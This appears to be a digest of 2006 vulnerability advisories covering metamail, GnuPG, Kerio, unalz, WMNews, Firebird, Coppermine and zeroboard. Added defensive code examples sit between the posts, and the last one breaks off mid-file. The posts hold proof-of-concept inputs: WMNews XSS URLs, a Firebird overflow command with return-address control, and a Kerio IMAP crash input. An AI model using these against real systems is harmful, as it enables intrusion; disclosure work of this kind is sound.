        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4.dsc
      Size/MD5 checksum:      613 6ee8aeff0f14e5d799a670fe727039c7
    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4.diff.gz
      Size/MD5 checksum:   333628 22588d5a91f53fdc1a6458c5519d2512
    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7.orig.tar.gz
      Size/MD5 checksum:   156656 c6967e9bc5d3c919764b02df24efca01

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_alpha.deb
      Size/MD5 checksum:   166084 a45a36ff283de7cb3ab3e43694f90c45

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_arm.deb
      Size/MD5 checksum:   153404 52e740cb6dbc32c860da10010bb90571

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_i386.deb
      Size/MD5 checksum:   150578 4d3e962558adfd7f43859b9f7fd30450

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_ia64.deb
      Size/MD5 checksum:   205790 1e9d9f11ca4fbb1863db2e205d808c23

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_hppa.deb
      Size/MD5 checksum:   153406 7897b81f6f0ee82abbcf415e258d8c9d

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_m68k.deb
      Size/MD5 checksum:   146400 a3cc53e414d0e60e54e4ac92849b4d0d

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_mips.deb
      Size/MD5 checksum:   158558 82cd3b0bb263e24f0a6f7c500a01d0af

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_mipsel.deb
      Size/MD5 checksum:   158562 b0a037641e1fa292decffa319cf75daf

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_powerpc.deb
      Size/MD5 checksum:   148694 f326ccce8fd7cf2445e0f716fcc65143

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_s390.deb
      Size/MD5 checksum:   151512 ad0e4e1d1ee73ac300e4f1dc07bcfb5d

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_sparc.deb
      Size/MD5 checksum:   155492 cf37f006621cbff83fb236afd8bfc223

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1.dsc
      Size/MD5 checksum:      594 3131f64cf684d62318636b8589acbc94
    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1.diff.gz
      Size/MD5 checksum:   340408 165af1d9cff83f10103ebddfdb90f2ad
    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7.orig.tar.gz
      Size/MD5 checksum:   156656 c6967e9bc5d3c919764b02df24efca01

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1_alpha.deb
      Size/MD5 checksum:   168190
Kerio MailServer bugfun
Hi,

It should be noted that the ProtoVer Sample IMAP testsuite has been
released with 3 unpublished bugs.

Now it looks like the Kerio MailServer preauth bug has been fixed.

Kerio MailServer 6.1.3 changelog:

  Version 6.1.3 Patch 1 - March 9, 2006
  - Fixed possible crash when handling special crafted IMAP LOGIN command.

The bug itself is really simple:

  $ ls PROTOVER_SAMPLE_IMAP-1.0/audit/
  iaemailserver-5.3.4  keriomailserver-6.1.2  merak-8.3.0
  $ cat PROTOVER_SAMPLE_IMAP-1.0/audit/keriomailserver-6.1.2
  a001 LOGIN {4294967294}
  LITERAL TOKEN
  a002 LOGOUT

Regards,
Evgeny Legerov
www.gleg.net
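The test case above announces an IMAP literal of 4294967294 bytes, two short of 2^32, before authentication. The post does not say what Kerio did with that count; the following is an added example written for this page, not Kerio's code, showing how a server-side parser should handle the {n} literal syntax: accumulate the count in 64-bit arithmetic, reject it before it can overflow, cap it at a pre-authentication limit, and never compute n + 2 (for the trailing CRLF) in 32-bit arithmetic without a check. MAX_LITERAL and the n + 2 sizing are assumptions for the example.

```c
/* Added example (not Kerio code): overflow-safe parsing of the IMAP
 * literal count "{n}" at the end of a command line. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MAX_LITERAL (64u * 1024u)   /* assumed: largest literal accepted before authentication */

/* Parse "{<digits>}" or the LITERAL+ form "{<digits>+}" at the end of line.
 * Returns 0 and sets *out on success; -1 on a syntax error, a count that
 * does not fit in 32 bits, or a count above MAX_LITERAL. */
int parse_literal_size(const char *line, uint32_t *out)
{
    const char *open = strrchr(line, '{');
    if (!open) return -1;
    const char *p = open + 1;
    uint64_t n = 0;
    int digits = 0;
    for (; *p >= '0' && *p <= '9'; p++) {
        n = n * 10 + (uint64_t)(*p - '0');
        /* ten digits already exceed 2^32 - 1 once n does; stop before a
         * further multiplication could overflow the 64-bit accumulator */
        if (++digits > 10 || n > UINT32_MAX) return -1;
    }
    if (digits == 0) return -1;
    if (*p == '+') p++;                                     /* non-synchronizing literal */
    if (*p != '}') return -1;
    p++;
    if (*p != '\0' && strcmp(p, "\r\n") != 0) return -1;    /* literal must end the line */
    if (n > MAX_LITERAL) return -1;
    *out = (uint32_t)n;
    return 0;
}

/* Buffer sizing as a careless parser would do it: n + 2 for the CRLF,
 * computed in 32 bits. For 4294967294 this wraps to 0. */
uint32_t naive_alloc_size(uint32_t n)
{
    return n + 2;
}

/* The safe counterpart: fails instead of wrapping. */
int safe_alloc_size(uint32_t n, uint32_t *out)
{
    if (n > UINT32_MAX - 2) return -1;
    *out = n + 2;
    return 0;
}

int main(void)
{
    /* Constructed input matching the shape of the test case above. */
    uint32_t n;
    int rc = parse_literal_size("a001 LOGIN {4294967294}\r\n", &n);
    printf("parse result for {4294967294}: %d\n", rc);                 /* -1 */
    printf("naive 32-bit n+2 for 4294967294: %u\n",
           (unsigned)naive_alloc_size(4294967294u));                   /* 0 */
    return 0;
}
```

Two independent defences are at work: the digit loop refuses anything that cannot be a 32-bit count, and the MAX_LITERAL cap refuses counts that are syntactically fine but unreasonable for an unauthenticated LOGIN. A server that applies only the second would still have to size its buffer with the overflow check shown in safe_alloc_size.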
[SECURITY] [DSA 993-2] New GnuPG packages fix broken signature check
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 993-2                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
March 13th, 2006                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : gnupg
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-0049

Tavis Ormandy noticed that gnupg, the GNU privacy guard - a free PGP
replacement, can be tricked to emit a good signature status message
when a valid signature is included which does not belong to the data
packet.

This update basically adds fixed packages for woody whose version
turned out to be vulnerable as well.

For the old stable distribution (woody) this problem has been fixed in
version 1.0.6-4woody5.

For the stable distribution (sarge) this problem has been fixed in
version 1.4.1-1.sarge3.

For the unstable distribution (sid) this problem has been fixed in
version 1.4.2.2-1.

We recommend that you upgrade your gnupg package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5.dsc
      Size/MD5 checksum:      579 b34d5a5996b358e713e2e8bb71dc6404
    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5.diff.gz
      Size/MD5 checksum:     7866 5e36a3c06fae2b3d96a9db65988fffbd
    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6.orig.tar.gz
      Size/MD5 checksum:  1941676 7c319a9e5e70ad9bc3bf0d7b5008a508

  Alpha architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_alpha.deb
      Size/MD5 checksum:  1150716 ff72280db81dbc60041cd91a0d307ee6

  ARM architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_arm.deb
      Size/MD5 checksum:   987194 1ca0bbdaaec049b128996cdd9f776834

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_i386.deb
      Size/MD5 checksum:   966800 52e985fbb5e9bcd7baa320c549b7b70c

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_ia64.deb
      Size/MD5 checksum:  1271958 27317f852e24ce3784ec62aec0860c6a

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_hppa.deb
      Size/MD5 checksum:  1059666 5b73bdfab02c7c8184b58db2c3e0b240

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_m68k.deb
      Size/MD5 checksum:   942614 c15e8b65687c52530e48665669dde8c3

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_mips.deb
      Size/MD5 checksum:  1035974 ce95aa0adb6060fc68119c4df3492293

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_mipsel.deb
      Size/MD5 checksum:  1036400 f40b42f381d7f04004f219c16de542fc

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_powerpc.deb
      Size/MD5 checksum:  1009720 8b0372d551b48829ce6be7d0f69f6559

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_s390.deb
      Size/MD5 checksum:  1002210 deef79ef16b8f5bac2b32f912caac46c

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_sparc.deb
      Size/MD5 checksum:  1003974 2bf876aa4b6a50cb3aadb7ef2e233f69

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3.dsc
      Size/MD5 checksum:      680 8f2f1848dcdfe9d143d8e9352ef918ca
    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3.diff.gz
      Size/MD5 checksum:    19639 9ffb89fa0a770568ddd80a11e3eada78
    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1.orig.tar.gz
      Size/MD5 checksum:  4059170 1cc77c6943baaa711222e954bbd785e5

  Alpha architecture:

    http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3_alpha.deb
      Size/MD5 checksum:  2155538 07b4643bf4cd05639a261fa0b3fa6a89

  AMD64 architecture:
Secunia Research: unalz Filename Handling Directory Traversal Vulnerability
======================================================================
                     Secunia Research 13/03/2006

     - unalz Filename Handling Directory Traversal Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

======================================================================
1) Affected Software

* unalz version 0.53.

Other versions may also be affected.

======================================================================
2) Severity

Rating: Less Critical
Impact: System access
Where:  Remote

======================================================================
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in unalz, which potentially can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an input validation error when extracting an ALZ archive. This makes it possible to have files extracted to arbitrary locations outside the specified directory using the "../" directory traversal sequence.

The vulnerability has been confirmed in version 0.53. Other versions may also be affected.

======================================================================
4) Solution

Update to version 0.55.

======================================================================
5) Time Table

02/03/2006 - Initial vendor notification.
10/03/2006 - Initial vendor reply.
13/03/2006 - Public disclosure.

======================================================================
6) Credits

Discovered by Tan Chew Keong, Secunia Research.

======================================================================
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-0950 for the vulnerability.

======================================================================
8) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-16/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
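The flaw above is the classic archive-extraction traversal: the extractor trusts the member name stored in the archive and joins it onto the output directory, so a name containing "../" escapes it. The following is an added example, not code from the Secunia advisory or from unalz, of the check an extractor should run on every member name before creating a file. The destination directory /tmp/unalz-out and the member names are made up for the example.

```python
"""Added example (not code from the Secunia advisory or from unalz): the
check an archive extractor should apply to every member name before it
creates a file, so that "../" sequences and absolute paths cannot place
files outside the destination directory."""
import os
import posixpath
from typing import Dict, List, Optional, Tuple

# Constructed member names, of the kind an ALZ (or any other) archive could
# carry. The first two are legitimate; the rest try to escape the target dir.
SAMPLE_MEMBERS = [
    "readme.txt",
    "docs/../docs/manual.txt",
    "../../etc/cron.d/job",
    "/etc/passwd",
    "..\\..\\Windows\\win.ini",
    "a/../../b.txt",
    "C:/boot.ini",
]


def safe_extract_path(dest_dir: str, member_name: str) -> Optional[str]:
    """Return the absolute path under `dest_dir` where `member_name` may be
    written, or None if the name would resolve outside that directory.

    Names are treated archive-style (forward slashes); backslashes are also
    taken as separators because Windows-built archives use them."""
    name = member_name.replace("\\", "/")
    # Empty names, absolute paths and drive letters are never acceptable.
    if not name or name.startswith("/"):
        return None
    if len(name) >= 2 and name[1] == ":":
        return None
    # Collapse ".", "//" and "x/.." segments. Whatever ".." survives this
    # step is a real climb out of the destination.
    normalized = posixpath.normpath(name)
    parts = normalized.split("/")
    if normalized == "." or parts[0] == "..":
        return None
    # Belt and braces: resolve against the real destination and confirm it
    # is still inside, independent of the string checks above.
    dest_abs = os.path.abspath(dest_dir)
    target = os.path.abspath(os.path.join(dest_abs, *parts))
    if os.path.commonpath([dest_abs, target]) != dest_abs:
        return None
    return target


def vet_members(dest_dir: str, names: List[str]) -> Tuple[Dict[str, str], List[str]]:
    """Split member names into {name: target path} and a list of rejects,
    without touching the filesystem."""
    accepted: Dict[str, str] = {}
    rejected: List[str] = []
    for name in names:
        target = safe_extract_path(dest_dir, name)
        if target is None:
            rejected.append(name)
        else:
            accepted[name] = target
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = vet_members("/tmp/unalz-out", SAMPLE_MEMBERS)
    for name, path in ok.items():
        print(f"extract  {name!r:35} -> {path}")
    for name in bad:
        print(f"REJECT   {name!r}")
```

The string checks alone would be enough for the cases listed, but the final commonpath comparison is kept because it does not depend on getting every special case right. Symbolic-link members (a link pointing outside the destination, followed by a file written through it) are a separate problem that this name check does not cover; an extractor has to refuse or rewrite such links as well.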
WMNews Cross Site Scripting
- WMNews Cross Site Scripting

Site: http://wartamikael.org/PHPScripts/
Demo: http://www.scriptevi.com/files/demo/news/wmnews/

---
Credit  : R00T3RR0R
webpage : www.biyosecurity.be
Mail    : [EMAIL PROTECTED]
---

WMNews:

http://victim/path/wmview.php?ArtCat=;<script>alert(/R00T3RR0R/)</script>
http://victim/path/footer.php?ctrrowcol=;<script>alert(/R00T3RR0R/)</script>
http://victim/path/wmcomments.php?act=vi&CmID=2&ArtID=;<script>alert(/R00T3RR0R/)</script>

Source:
http://www.blogcu.com/Liz0ziM/350164/
http://biyosecurity.be/bugs/wmnews.txt
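Probes like the three above leave a clear trace in the web server's access log, which is where an administrator of an unpatched WMNews install would look for them. The following is an added example, not part of the WMNews post, of detection logic run over a few constructed Apache-style log lines; the hosts, timestamps and requests in SAMPLE_LOG are made up, and they include URL-encoded and case-mangled variants because that is how such requests usually arrive.

```python
"""Added example (not from the WMNews advisory): detection of reflected-XSS
probes in web access logs. The query string is decoded and lower-cased
before matching, since real probes are usually percent-encoded or
case-mangled to slip past naive string matches."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample log lines (combined log format); hosts, paths and
# timestamps are invented for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Mar/2006:10:01:12 +0000] "GET /wmview.php?ArtCat=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Mar/2006:10:02:40 +0000] "GET /wmview.php?ArtCat=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Mar/2006:10:02:41 +0000] "GET /footer.php?ctrrowcol=%3CScRiPt%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Mar/2006:10:02:42 +0000] "GET /wmcomments.php?act=vi&CmID=2&ArtID=%22%20onmouseover%3D%22alert(1) HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
198.51.100.2 - - [13/Mar/2006:10:03:05 +0000] "GET /wmcomments.php?act=vi&CmID=2&ArtID=7 HTTP/1.1" 200 1300 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request target and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers that indicate script injection once a parameter value is decoded.
XSS_MARKERS = [
    re.compile(r"<\s*script\b", re.I),      # <script>, < script, <ScRiPt
    re.compile(r"javascript\s*:", re.I),    # javascript: URLs in href/src
    re.compile(r"\bon[a-z]+\s*=", re.I),    # inline handlers such as onmouseover=
]


def decode_param(value: str) -> str:
    """Decode repeatedly (bounded) so double-encoded payloads are seen too."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_params(target: str):
    """Return [(param, decoded_value, marker)] for every suspicious parameter
    in the request target's query string."""
    query = urlsplit(target).query
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_param(raw)
        for marker in XSS_MARKERS:
            if marker.search(value):
                hits.append((name, value, marker.pattern))
                break
    return hits


def scan_log(text: str):
    """Return one dict per suspicious request: client ip, path and the
    offending parameter names. Unparseable lines are skipped."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = find_xss_params(m.group("target"))
        if hits:
            alerts.append({
                "ip": m.group("ip"),
                "path": urlsplit(m.group("target")).path,
                "params": [h[0] for h in hits],
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A 200 status on these lines is what makes them worth alerting on: the application reflected the parameter instead of rejecting it. The fix on the application side is the same for all three WMNews scripts, output-encoding ArtCat, ctrrowcol and ArtID before they are echoed into HTML.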
Buffer Overflow and Installation Script Error in Firebird 1.5.3
Hi to all!

In the latest Firebird release (1.5.3) various security problems have been fixed. Attached goes an advisory about 2 of these.

---
Joxean Koret
---

Buffer Overflow and Installation Script Error in Firebird 1.5.3
---------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005-02-18
Location: Basque Country

---
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Product: Firebird
Vulnerable Version: 1.5.2.4731

Description: Firebird is a relational database offering many ANSI SQL-99 features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names, since 1981.

Web: http://firebird.sourceforge.net

---
Vulnerability List:
~~~~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecessarily
B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

Vulnerabilities:

A.- Install script makes fb_inet_server and fbserver suid firebird unnecessarily
-

The installation script of Firebird 1.5.2 makes the binaries fb_inet_server and fbserver suid firebird, but this is unnecessary. If you take a look at the install script firebird1.5.2./scripts/postinstall.sh you will see the following lines:

    (...)
    # SUID is still needed for group direct access. General users
    # cannot run though.
    for i in fb_lock_mgr gds_drop fb_inet_server
    do
        if [ -f $i ]
        then
            chmod ug=rx,o= $i
            chmod ug+s $i
        fi
    done
    (...)

but, as the author says, the fb_inet_server (at least) doesn't need to be suid firebird. The following is a fragment of Alex Peshkov's (a Firebird developer) response about this problem:

    They need not and should not be set*id. And in standard precompiled binaries fbserver is not setuid. But for unknown to me reasons fb_inet_server is made setuid 'firebird' by install script (Debian guys fixed it, I think). I've noticed it, unfortunately, after release of 1.5.2, but definitely will fix it in future releases. Except security vulnerability this brings additional problem when one wants to change fb_inet_server run-user - changing only xinetd.d entry is not enough.

- Debian distributions are not vulnerable to this problem. As Alex Peshkov says, the Debian people have fixed it.

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries
-

The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable to buffer overflows. If a string of more than 150 characters is passed to the '-p' parameter of any of these binaries the program will crash with a Segmentation Fault message.

- The following is a test of the vulnerability:

    /usr/lib/firebird2/bin$ ls
    fb_lock_print  fbguard  fbmgr  fbmgr.bin  fbserver  gsec
    /usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print "a"x155;'`1234
    Segmentation fault

The program dies abruptly. The bytes passed from position 155 to 159 overwrite the return address:

    /usr/lib/firebird2/bin$ gdb ./fbserver
    GNU gdb 6.3
    (...)
    (gdb) run -p `perl -e 'print "a"x155;'`4321
    Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print "a"x155;'`4321
    (...)
    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread -1210892160 (LWP 25358)]
    0x31323334 in ?? ()

We have overwritten the return address with the bytes 0x31 0x32 0x33 0x34, the numbers 4 3 2 1 in reverse order.

    (gdb) where
    #0  0x31323334 in ?? ()
    #1  0x08233496 in ?? ()
    #2  0x in ?? ()
    #3  0xb9b0 in ?? ()
    #4  0x6161 in ?? ()
    #5  0x in ?? ()
    #6  0x in ?? ()
    #7  0x in ?? ()
    #8  0x in ?? ()
    #9  0x in ?? ()
    #10 0xb9b0 in ?? ()
    #11 0x in ?? ()
    #12 0x in ?? ()
    #13 0x in ?? ()
    #14 0xbb04 in ?? ()
    #15 0x0804e370 in ?? ()
    #16 0x in ?? ()
    #17 0xbd50 in ?? ()
    #18 0x in ?? ()
    #19 0x in ?? ()
    #20 0x in ?? ()
    #21 0x in ?? ()
    #22 0x in ?? ()

Notes:
~~~~~~

- Various other problems, not discovered by me, have been fixed in the 1.5.3 version. I encourage everyone to upgrade to the newest version as soon as possible. Patches for the
Re: Coppermine exploit used by a Chase Phish?
Coppermine is subject to multiple exploits; for the most part exploiters do not need to have much knowledge of its workings. There is a script called nst.php which is saved as a rar file and uploaded into the coppermine (unless coppermine is properly configured to not accept anything but image files). This nst.php script allows them to run a local acct on the system and browse through directories, upload new files, even access the sql u/p and the sql database. There is a good possibility this is what happened: some kid hacked the coppermine using a script similar to nst.php, uploaded it, got into the server, and simply uploaded the phish script. Pretty easy to do actually, and a simple google search for [subject], powered by coppermine will give an extended list of possible targets for the exploiter to attack.

Paul Laudanski wrote:
> I got sent a Chase phish email tonight and in checking it out it appears to be live on a Coppermine gallery installation. Is this a new exploit of Coppermine, or just this site hasn't been yet patched?
>
> A photo of the phish site with the URL (domain blacked out):
> http://castlecops.com/p728141-Mar_10_Phish_Alerts.html#728141
[INetCop Security Advisory] zeroboard IP session bypass XSS vulnerability
INetCop Security Advisory #2006-0x82-029

* Title: zeroboard IP session bypass XSS vulnerability

0x01. Description

Zeroboard is a popular web notice board used in Korea. INetCop Security found an XSS vulnerability in the latest zeroboard version 4.1 pl 7 (2005. 4. 4).

Basically, zeroboard uses the following algorithm so that a session may not be abused by cookie-related attacks (e.g. cookie spoofing, sniffing). After login, this is the part that handles the session:

-- bbs/login_check.php:
    ...
    // If the member login succeeded, create the session and move to the next page
    if($member_data[no]) {

        if($auto_login) {
            makeZBSessionID($member_data[no]);
        }

        // Session handling for 4.0x
        $zb_logged_no = $member_data[no];
        $zb_logged_time = time();
        $zb_logged_ip = $REMOTE_ADDR;              --- Recording IP address
        $zb_last_connect_check = '0';

        session_register(zb_logged_no);
        session_register(zb_logged_time);
        session_register(zb_logged_ip);
        session_register(zb_last_connect_check);

--

If the IP address is different from the present session user's, the connection terminates:

-- bbs/lib.php:
    // Check the session values and handle login
    } elseif($HTTP_SESSION_VARS[zb_logged_no]) {

        // Log out if the login time exceeded the configured limit or the login IP differs from the current user's IP
        if(time()-$HTTP_SESSION_VARS[zb_logged_time] > $_zbDefaultSetup[login_time] || $HTTP_SESSION_VARS[zb_logged_ip] != $REMOTE_ADDR) {

            $zb_logged_no = "";   // session initialization
            $zb_logged_time = "";
            $zb_logged_ip = "";
            session_register(zb_logged_no);
            session_register(zb_logged_ip);
            session_register(zb_logged_time);
            session_destroy();

        // If valid, reset the login time
        } else {
--

This seems to intercept cookie hacking. But if we take advantage of the IP session disablement technique, session bypassing may be possible. A detailed explanation of the way to exploit this vulnerability is found at the following reference.

URL: http://x82.inetcop.org/h0me/papers/iframe_tag_exploit.txt (Korean)

As a result, an attacker can get exploit code to run through the administrator's web browser.

--

0x02. Vulnerable Packages

Vendor site: http://www.nzeo.com/

Lower versions including Zeroboard 4.1 pl 7 (2005. 4. 4) version.
-zb41pl7.tar.Z

Disclosure Timeline:

2003-04.??: Vulnerabilities found.
2006-02.17: 1st vendor contact. (didn't respond)
2006-02.22: 2nd vendor contact. (didn't respond)
2006-02.25: Vendor responded, patch released.
2006-03.12: Public disclosure.

0x03. Exploit

We have 2 `Proof-of-Concept' exploits for this vulnerability. This XSS vulnerability happens in the memo box title and in the user email and homepage information input. When the administrator logs in and checks a user information page, the attack code is executed; there is another way, which injects an attack code in the memo title.

After exploitation, an attacker can inject PHP code through an administrator web page function. Through this PHP code injection, the attacker (a normal user) can change the administrator's password and take the administrator's privileges.

To prevent the abuse of this vulnerability, INetCop Security will not publish POC code.

0x04. Patch

INetCop Security released a temporary patch:

INetCop Security Patch URL: http://inetcop.net/upfiles/Zeroboard-4.1_pl7_patch.tgz

And the vendor's patch after the INetCop Security advisory:

Vendor Patch URL: http://www.nzeo.com/bbs/zboard.php?id=cgi_bugreport2no=5406

--

Thank you.

P.S: I give thanks to Securityproof, who suffered through the translation.

Korean Advisory URL: http://www.inetcop.org/upfiles/33INCSA.2006-0x82-029-zeroboard.pdf

--
By dong-houn yoU (Xpl017Elz), in INetCop(c) Security.

MSN E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org
My World: http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--
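The advisory's point is easy to miss: the IP-and-age check quoted from bbs/lib.php is sound against a stolen cookie, but it is transparent to stored XSS, because script planted in a memo title or profile field runs inside the administrator's own browser and every request it makes carries the administrator's IP and a live session. What was missing is output encoding of those member-supplied fields on the admin pages. The following is an added example, not zeroboard's code, that ports the quoted check to Python and renders the fields the advisory names (memo title, email, homepage) with and without encoding. LOGIN_TIME_LIMIT stands in for $_zbDefaultSetup[login_time], whose real value the advisory does not give; the session and member records are constructed.

```python
"""Added example (not zeroboard's code): a Python rendering of the session
check quoted from bbs/lib.php (login age plus IP binding), beside the
output encoding that the administrator pages lacked for member-supplied
fields. It shows that the IP binding does nothing against stored XSS:
script injected into a member field runs in the administrator's own
browser, so its requests carry the administrator's IP and pass the check."""
import html
from urllib.parse import urlsplit

# Assumed stand-in for $_zbDefaultSetup[login_time] (seconds); the real
# default is not given in the advisory.
LOGIN_TIME_LIMIT = 3600


def session_valid(session: dict, remote_addr: str, now: float,
                  login_time_limit: int = LOGIN_TIME_LIMIT) -> bool:
    """Same decision as the quoted PHP: no login, a stale login, or a client
    IP different from the one recorded at login ends the session."""
    if not session.get("zb_logged_no"):
        return False
    if now - session["zb_logged_time"] > login_time_limit:
        return False
    if session["zb_logged_ip"] != remote_addr:
        return False
    return True


def safe_url(url: str) -> str:
    """Only http(s) links may go into an href; anything else (javascript:,
    data:, vbscript:) is replaced, because HTML escaping alone does not stop
    a script URL from executing when the link is clicked."""
    return url if urlsplit(url.strip()).scheme.lower() in ("http", "https") else "#"


def render_member_row(member: dict, escape: bool) -> str:
    """Render the fields the advisory names (memo title, e-mail, homepage) as
    one row of the admin member-info page. escape=False reproduces the
    vulnerable behaviour; escape=True is the fix."""
    if escape:
        enc = html.escape
        href = html.escape(safe_url(member["homepage"]), quote=True)
    else:
        enc = lambda s: s  # noqa: E731 - deliberately the identity
        href = member["homepage"]
    return (
        "<tr>"
        f"<td>{enc(member['memo_title'])}</td>"
        f"<td><a href=\"mailto:{enc(member['email'])}\">{enc(member['email'])}</a></td>"
        f"<td><a href=\"{href}\">{enc(member['homepage'])}</a></td>"
        "</tr>"
    )


# Constructed sample data. ADMIN_SESSION is what login_check.php would have
# stored for an administrator who logged in from 192.0.2.10 at t=1000.
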